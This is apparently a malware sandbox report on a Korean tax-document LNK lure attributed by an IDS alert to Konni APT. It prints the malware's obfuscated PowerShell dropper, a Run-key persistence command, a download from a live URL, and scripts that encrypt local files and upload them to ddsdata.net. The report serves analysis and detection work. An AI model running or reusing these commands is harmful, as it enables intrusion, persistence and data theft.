미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk| Category | Machine | Started | Completed |
|---|---|---|---|
| FILE | s1_win7_x6402 | Dec. 14, 2023, 11:03 a.m. | Dec. 14, 2023, 11:05 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "HkfazyDopWVySG" "C:\Users\test22\AppData\Local\Temp\미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk"
3004-
cmd.exe "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);^<#letch overnegligently transactinide#^> $jpgrvGKusY=New-Object ^<#tornese ungospelized nondesignate#^>System.IO.FileStream($vOiCAahtou,^<#uncross traceless bonita#^>[System.IO.FileMode]::Open,^<#spasmotin aborigine panzootic#^>[System.IO.FileAccess]::Read);^<#wariangle aristolochiaceous fictioneering#^> $jpgrvGKusY.Seek($YTMhzLrhzIPV,^<#quipsomeness stercoral undeceptitious#^>[System.IO.SeekOrigin]::Begin);^<#marchantia oversoar duplicature#^> $VJOInKKXMRvQ=New-Object ^<#limnobium benzoic reefed#^>byte[] $ODtndleakm;^<#refries syndeses vermifugous#^> $jpgrvGKusY.Read($VJOInKKXMRvQ,^<#nonexemption preinitiated untruced#^>0,$ODtndleakm);^<#hematocytozoon commensalistic congregationalism#^> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc ^<#cavallas vapidness trabecule#^> $fNjGFHMrbWA ^<#semirigorously harmoniphone oxalated#^> $VJOInKKXMRvQ -Encoding ^<#irrefrangible rivalries dumontite#^> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);^<#rezbanyite orth gavelling#^> $KzOQvdcXYdjO=Get-ChildItem ^<#enheritage dialogite gorgonizing#^>-Path ^<#haemorrhagic aftershafted transplantar#^> $sBDFnkRezJN -Recurse ^<#preestimating arrivistes perfectionator#^>*.lnk ^<#unspillable thiobacteriales inverts#^>^| ^<#colliculate unwitch unmeekness#^>where-object ^<#apophyeeal oculauditory dackered#^>{$_.length ^<#cannonry resoluble diplocoria#^>-eq 0x042D9905} ^<#reendow unvoyaging engrossed#^>^| Select-Object ^<#certifiers gelechiid azeotrope#^>-ExpandProperty ^<#tabors lonhyn halavahs#^>FullName; return ^<#busybodyism cabrito sweepier#^> $KzOQvdcXYdjO;^<#pueblos pimas lutheran#^>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ ^<#muniments cryoconite cruets#^>-sBDFnkRezJN ^<#excludability hemen assassinative#^> $bKACpSJxmuLd;if($ofHLTkfBuY.length^<#bebite cesspits backstops#^> -eq 0){$ofHLTkfBuY=hwqBULFNvJ ^<#proceritic earned nondisturbing#^> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path ^<#disentrancement bomble dobule#^> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) ^<#jumma nonsensualistic grade#^>+ '';BYPVVObtSBg -vOiCAahtou ^<#homaxonic standbys gunbuilder#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#counterbend elvan chihuahua#^> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr ^<#cheselip centunculus hyperadipose#^> 0x10 -fNjGFHMrbWA ^<#pseudangina reemerge minchah#^> $lBLKeytyGN;^&^<#physis manipulated cauli#^> $lBLKeytyGN;$jsdoulrAkk=$env:public ^<#acuter orphrey remastication#^>+ '\' ^<#pest hazers jaspidean#^>+^<#anthryl koch seamy#^> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou ^<#seriating unrestrictedly huntsmen#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#hyperendocrinia inconsequence flandowser#^> 0x00006AB4 -ODtndleakm ^<#anilopyrin chondrodite dackers#^> 0x00013AA1 -MqCNDxmeLr ^<#semirebelliousness concretions uncolonizing#^> 0x20 -fNjGFHMrbWA ^<#wampuses perruche esotericist#^> $jsdoulrAkk;Remove-Item -Path ^<#unveritable scuttlebutt printmaker#^> $ofHLTkfBuY -Force;expand $jsdoulrAkk ^<#uncompliantly polemics tracheobronchitis#^> -F:* ^<#autogenously dhyana yus#^> ($env:public ^<#perorative influenced shader#^>+^<#cisjurane limericks unbeholden#^> '\' ^<#subpenaing varitype sciuroid#^>+^<#broomrape uncoloredly glandlike#^> 'documents');remove-item ^<#rimous zaptiahs cougher#^> -path ^<#strumectomy hoecake etherish#^> $jsdoulrAkk ^<#dwindlement periclasite pelargonidin#^>-force;$NjVWyNaCkCJM=$env:public^<#larcher rascalship slough#^>+'\documents\start.vbs';^&^<#paradisea parser diapaused#^> $NjVWyNaCkCJM;
2208-
powershell.exe powershell -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);<#letch overnegligently transactinide#> $jpgrvGKusY=New-Object <#tornese ungospelized nondesignate#>System.IO.FileStream($vOiCAahtou,<#uncross traceless bonita#>[System.IO.FileMode]::Open,<#spasmotin aborigine panzootic#>[System.IO.FileAccess]::Read);<#wariangle aristolochiaceous fictioneering#> $jpgrvGKusY.Seek($YTMhzLrhzIPV,<#quipsomeness stercoral undeceptitious#>[System.IO.SeekOrigin]::Begin);<#marchantia oversoar duplicature#> $VJOInKKXMRvQ=New-Object <#limnobium benzoic reefed#>byte[] $ODtndleakm;<#refries syndeses vermifugous#> $jpgrvGKusY.Read($VJOInKKXMRvQ,<#nonexemption preinitiated untruced#>0,$ODtndleakm);<#hematocytozoon commensalistic congregationalism#> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc <#cavallas vapidness trabecule#> $fNjGFHMrbWA <#semirigorously harmoniphone oxalated#> $VJOInKKXMRvQ -Encoding <#irrefrangible rivalries dumontite#> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);<#rezbanyite orth gavelling#> $KzOQvdcXYdjO=Get-ChildItem <#enheritage dialogite gorgonizing#>-Path <#haemorrhagic aftershafted transplantar#> $sBDFnkRezJN -Recurse <#preestimating arrivistes perfectionator#>*.lnk <#unspillable thiobacteriales inverts#>| <#colliculate unwitch unmeekness#>where-object <#apophyeeal oculauditory dackered#>{$_.length <#cannonry resoluble diplocoria#>-eq 0x042D9905} <#reendow unvoyaging engrossed#>| Select-Object <#certifiers gelechiid azeotrope#>-ExpandProperty <#tabors lonhyn halavahs#>FullName; return <#busybodyism cabrito sweepier#> $KzOQvdcXYdjO;<#pueblos pimas lutheran#>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ <#muniments cryoconite cruets#>-sBDFnkRezJN <#excludability hemen assassinative#> $bKACpSJxmuLd;if($ofHLTkfBuY.length<#bebite cesspits backstops#> -eq 0){$ofHLTkfBuY=hwqBULFNvJ <#proceritic earned nondisturbing#> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path <#disentrancement bomble dobule#> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) <#jumma nonsensualistic grade#>+ '';BYPVVObtSBg -vOiCAahtou <#homaxonic standbys gunbuilder#> $ofHLTkfBuY -YTMhzLrhzIPV <#counterbend elvan chihuahua#> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr <#cheselip centunculus hyperadipose#> 0x10 -fNjGFHMrbWA <#pseudangina reemerge minchah#> $lBLKeytyGN;&<#physis manipulated cauli#> $lBLKeytyGN;$jsdoulrAkk=$env:public <#acuter orphrey remastication#>+ '\' <#pest hazers jaspidean#>+<#anthryl koch seamy#> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou <#seriating unrestrictedly huntsmen#> $ofHLTkfBuY -YTMhzLrhzIPV <#hyperendocrinia inconsequence flandowser#> 0x00006AB4 -ODtndleakm <#anilopyrin chondrodite dackers#> 0x00013AA1 -MqCNDxmeLr <#semirebelliousness concretions uncolonizing#> 0x20 -fNjGFHMrbWA <#wampuses perruche esotericist#> $jsdoulrAkk;Remove-Item -Path <#unveritable scuttlebutt printmaker#> $ofHLTkfBuY -Force;expand $jsdoulrAkk <#uncompliantly polemics tracheobronchitis#> -F:* <#autogenously dhyana yus#> ($env:public <#perorative influenced shader#>+<#cisjurane limericks unbeholden#> '\' <#subpenaing varitype sciuroid#>+<#broomrape uncoloredly glandlike#> 'documents');remove-item <#rimous zaptiahs cougher#> -path <#strumectomy hoecake etherish#> $jsdoulrAkk <#dwindlement periclasite pelargonidin#>-force;$NjVWyNaCkCJM=$env:public<#larcher rascalship slough#>+'\documents\start.vbs';&<#paradisea parser diapaused#> $NjVWyNaCkCJM;
2268-
Hwp.exe "C:\Program Files (x86)\Hnc\Hwp80\Hwp.exe" "C:\Users\test22\AppData\Local\Temp\미신고 자금출처명세서(부가가치세법 시행규칙).hwp"
2372-
HimTrayIcon.exe "C:\Program Files (x86)\Hnc\Common80\HimTrayIcon.exe"
2108
-
-
expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\vOiCAa.cab -F:* C:\Users\Public\documents
1648 -
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\documents\start.vbs"
2520
-
-
-
-
-
reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f
2652 -
powershell.exe powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcBytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encBytes = New-Object byte[] $srcBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encBytes[$n] = $srcBytes[$n] -bxor $s[$t];}$encString = [System.Convert]::ToBase64String($encBytes);return $encString;}$url1 = 'https://aufildeseaux.com/wp-admin/includes/main/read/get.php?pw=xlse&cm=ns0010';$outfile = 'C:\Users\Public\Documents\di3726.zip';Add-Type -AssemblyName 'System.Web'; $key=(Get-Date).Ticks.ToString(); $qryStr = $url1.Split('?')[1]; $encoded = ES113 -src1205 $qryStr -Key $key;$url1=$url1.Split('?')[0]+'?'+$key+'='+[System.Web.HttpUtility]::UrlEncode($encoded);iwr -Uri $url1 -OutFile $outfile;"
2780 -
systeminfo.exe systeminfo
1620 -
timeout.exe timeout -t 5 /nobreak
1704 -
powershell.exe powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_down.txt';$fp='C:\Users\Public\Documents\down.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}"
3028 -
powershell.exe powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_docu.txt';$fp='C:\Users\Public\Documents\docu.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}"
2336 -
powershell.exe powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_desk.txt';$fp='C:\Users\Public\Documents\desk.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}"
1732
-
-
explorer.exe C:\Windows\Explorer.EXE
1236
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| ddsdata.net | 5.255.127.177 |
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.102:49186 -> 5.255.127.177:80 | 2046820 | ET MALWARE [ANY.RUN] Konni.APT Exfiltration | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
| suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://ddsdata.net/upload.php | ||||||
| request | POST http://ddsdata.net/upload.php |
| request | POST http://ddsdata.net/upload.php |
| file | C:\Users\test22\AppData\Roaming\HNC\Office\Recent\미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk |
| file | C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk |
| file | C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk |
| file | C:\Users\Public\Documents\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
| file | C:\Users\test22\AppData\Roaming\HNC\Office\Recent\미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk |
| file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
| file | C:\Users\test22\AppData\Local\Temp\미신고 자금출처명세서(부가가치세법 시행규칙).hwp.lnk |
| cmdline | "C:\Windows\system32\cmd.exe" /c p^owe^rshe^l^l -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);^<#letch overnegligently transactinide#^> $jpgrvGKusY=New-Object ^<#tornese ungospelized nondesignate#^>System.IO.FileStream($vOiCAahtou,^<#uncross traceless bonita#^>[System.IO.FileMode]::Open,^<#spasmotin aborigine panzootic#^>[System.IO.FileAccess]::Read);^<#wariangle aristolochiaceous fictioneering#^> $jpgrvGKusY.Seek($YTMhzLrhzIPV,^<#quipsomeness stercoral undeceptitious#^>[System.IO.SeekOrigin]::Begin);^<#marchantia oversoar duplicature#^> $VJOInKKXMRvQ=New-Object ^<#limnobium benzoic reefed#^>byte[] $ODtndleakm;^<#refries syndeses vermifugous#^> $jpgrvGKusY.Read($VJOInKKXMRvQ,^<#nonexemption preinitiated untruced#^>0,$ODtndleakm);^<#hematocytozoon commensalistic congregationalism#^> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc ^<#cavallas vapidness trabecule#^> $fNjGFHMrbWA ^<#semirigorously harmoniphone oxalated#^> $VJOInKKXMRvQ -Encoding ^<#irrefrangible rivalries dumontite#^> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);^<#rezbanyite orth gavelling#^> $KzOQvdcXYdjO=Get-ChildItem ^<#enheritage dialogite gorgonizing#^>-Path ^<#haemorrhagic aftershafted transplantar#^> $sBDFnkRezJN -Recurse ^<#preestimating arrivistes perfectionator#^>*.lnk ^<#unspillable thiobacteriales inverts#^>^| ^<#colliculate unwitch unmeekness#^>where-object ^<#apophyeeal oculauditory dackered#^>{$_.length ^<#cannonry resoluble diplocoria#^>-eq 0x042D9905} ^<#reendow unvoyaging engrossed#^>^| Select-Object ^<#certifiers gelechiid azeotrope#^>-ExpandProperty ^<#tabors lonhyn halavahs#^>FullName; return ^<#busybodyism cabrito sweepier#^> $KzOQvdcXYdjO;^<#pueblos pimas lutheran#^>};$bKACpSJxmuLd=Get-Location;$ofHLTkfBuY=hwqBULFNvJ ^<#muniments cryoconite cruets#^>-sBDFnkRezJN ^<#excludability hemen assassinative#^> $bKACpSJxmuLd;if($ofHLTkfBuY.length^<#bebite cesspits backstops#^> -eq 0){$ofHLTkfBuY=hwqBULFNvJ ^<#proceritic earned nondisturbing#^> -sBDFnkRezJN $env:Temp;} $bKACpSJxmuLd=Split-Path ^<#disentrancement bomble dobule#^> $ofHLTkfBuY;$lBLKeytyGN = $ofHLTkfBuY.substring(0,$ofHLTkfBuY.length-4) ^<#jumma nonsensualistic grade#^>+ '';BYPVVObtSBg -vOiCAahtou ^<#homaxonic standbys gunbuilder#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#counterbend elvan chihuahua#^> 0x000022B4 -ODtndleakm 0x00004800 -MqCNDxmeLr ^<#cheselip centunculus hyperadipose#^> 0x10 -fNjGFHMrbWA ^<#pseudangina reemerge minchah#^> $lBLKeytyGN;^&^<#physis manipulated cauli#^> $lBLKeytyGN;$jsdoulrAkk=$env:public ^<#acuter orphrey remastication#^>+ '\' ^<#pest hazers jaspidean#^>+^<#anthryl koch seamy#^> 'vOiCAa.cab';BYPVVObtSBg -vOiCAahtou ^<#seriating unrestrictedly huntsmen#^> $ofHLTkfBuY -YTMhzLrhzIPV ^<#hyperendocrinia inconsequence flandowser#^> 0x00006AB4 -ODtndleakm ^<#anilopyrin chondrodite dackers#^> 0x00013AA1 -MqCNDxmeLr ^<#semirebelliousness concretions uncolonizing#^> 0x20 -fNjGFHMrbWA ^<#wampuses perruche esotericist#^> $jsdoulrAkk;Remove-Item -Path ^<#unveritable scuttlebutt printmaker#^> $ofHLTkfBuY -Force;expand $jsdoulrAkk ^<#uncompliantly polemics tracheobronchitis#^> -F:* ^<#autogenously dhyana yus#^> ($env:public ^<#perorative influenced shader#^>+^<#cisjurane limericks unbeholden#^> '\' ^<#subpenaing varitype sciuroid#^>+^<#broomrape uncoloredly glandlike#^> 'documents');remove-item ^<#rimous zaptiahs cougher#^> -path ^<#strumectomy hoecake etherish#^> $jsdoulrAkk ^<#dwindlement periclasite pelargonidin#^>-force;$NjVWyNaCkCJM=$env:public^<#larcher rascalship slough#^>+'\documents\start.vbs';^&^<#paradisea parser diapaused#^> $NjVWyNaCkCJM; |
| cmdline | powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_desk.txt';$fp='C:\Users\Public\Documents\desk.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}" |
| cmdline | powershell -command "function ES113{param ([Parameter(Mandatory=$true)] [string]$src1205,[Parameter(Mandatory=$true)] [string]$Key);$srcbytes = [System.Text.Encoding]::UTF8.GetBytes($src1205); $kbytes12 = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $kbytes12[$i % $kbytes12.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encbytes12 = New-Object byte[] $srcbytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $srcbytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encbytes12[$n] = $srcbytes[$n] -bxor $s[$t];}$encstr12 = [System.Convert]::ToBase64String($encbytes12);return $encstr12;}$key=(Get-Date).Ticks.ToString();$tgurl12='http://ddsdata.net/upload.php';$fn='TEST22-PC_docu.txt';$fp='C:\Users\Public\Documents\docu.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ES113 -src1205 $fn -Key $key;$dt=ES113 -src1205 $dt -Key $key;$qry12 = [System.Web.HttpUtility]::ParseQueryString('');$qry12['fn']=$fn;$qry12['fd']=$dt;$qry12['r']=$key;$b=$qry12.ToString();$b12=[System.Text.Encoding]::UTF8.GetBytes($b);$wr12=[System.Net.WebRequest]::Create($tgurl12);$wr12.Method='POST';$wr12.ContentType='applic'+'ation/x'+'-ww'+'w-for'+'m-ur'+'lenco'+'ded';$wr12.ContentLength=$b12.Length;$rss12 = $wr12.GetRequestStream();$rss12.Write($b12,0,$b12.Length);$rss12.Close();$rsd12=$wr12.GetResponse();if($rsd12.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\up'+'ok.t'+'xt';New-Item -ItemType File -Path $fpok;}" |
| cmdline | powershell -windowstyle hidden function BYPVVObtSBg{param($vOiCAahtou,$YTMhzLrhzIPV,$ODtndleakm,$MqCNDxmeLr,$fNjGFHMrbWA);<#letch overnegligently transactinide#> $jpgrvGKusY=New-Object <#tornese ungospelized nondesignate#>System.IO.FileStream($vOiCAahtou,<#uncross traceless bonita#>[System.IO.FileMode]::Open,<#spasmotin aborigine panzootic#>[System.IO.FileAccess]::Read);<#wariangle aristolochiaceous fictioneering#> $jpgrvGKusY.Seek($YTMhzLrhzIPV,<#quipsomeness stercoral undeceptitious#>[System.IO.SeekOrigin]::Begin);<#marchantia oversoar duplicature#> $VJOInKKXMRvQ=New-Object <#limnobium benzoic reefed#>byte[] $ODtndleakm;<#refries syndeses vermifugous#> $jpgrvGKusY.Read($VJOInKKXMRvQ,<#nonexemption preinitiated untruced#>0,$ODtndleakm);<#hematocytozoon commensalistic congregationalism#> $jpgrvGKusY.Close();for($jqqJILuBGK=0;$jqqJILuBGK -lt $ODtndleakm;$jqqJILuBGK++){$VJOInKKXMRvQ[$jqqJILuBGK]=$VJOInKKXMRvQ[$jqqJILuBGK] -bxor $MqCNDxmeLr;}sc <#cavallas vapidness trabecule#> $fNjGFHMrbWA <#semirigorously harmoniphone oxalated#> $VJOInKKXMRvQ -Encoding <#irrefrangible rivalries dumontite#> Byte;};function hwqBULFNvJ{param($sBDFnkRezJN);<#rezbanyite orth gavelling#> $KzOQvdcXYdjO=Get-ChildItem <#enheritage dialogite 